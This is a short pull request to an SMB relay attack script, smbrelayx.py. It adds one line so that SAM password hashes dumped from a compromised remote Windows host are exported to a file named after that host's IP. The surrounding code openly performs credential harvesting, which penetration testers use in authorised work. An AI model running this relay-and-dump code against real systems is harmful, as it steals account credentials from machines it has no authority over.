### PR TITLE
Save SAM hashes to log

### DIFF
--- a/examples/smbrelayx.py
+++ b/examples/smbrelayx.py
@@ -114,6 +114,7 @@ class doAttack(Thread):
                     samFileName = remoteOps.saveSAM()
                     samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
                     samHashes.dump()
+		    samHashes.export(self.__SMBConnection.getRemoteHost())
                     logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
             except Exception, e:
                 logging.error(str(e))


### PR DESCRIPTION
For output filename i used the remote IP address. If in the future multi target is added, this would make it easier to create a SAM dump for each system.
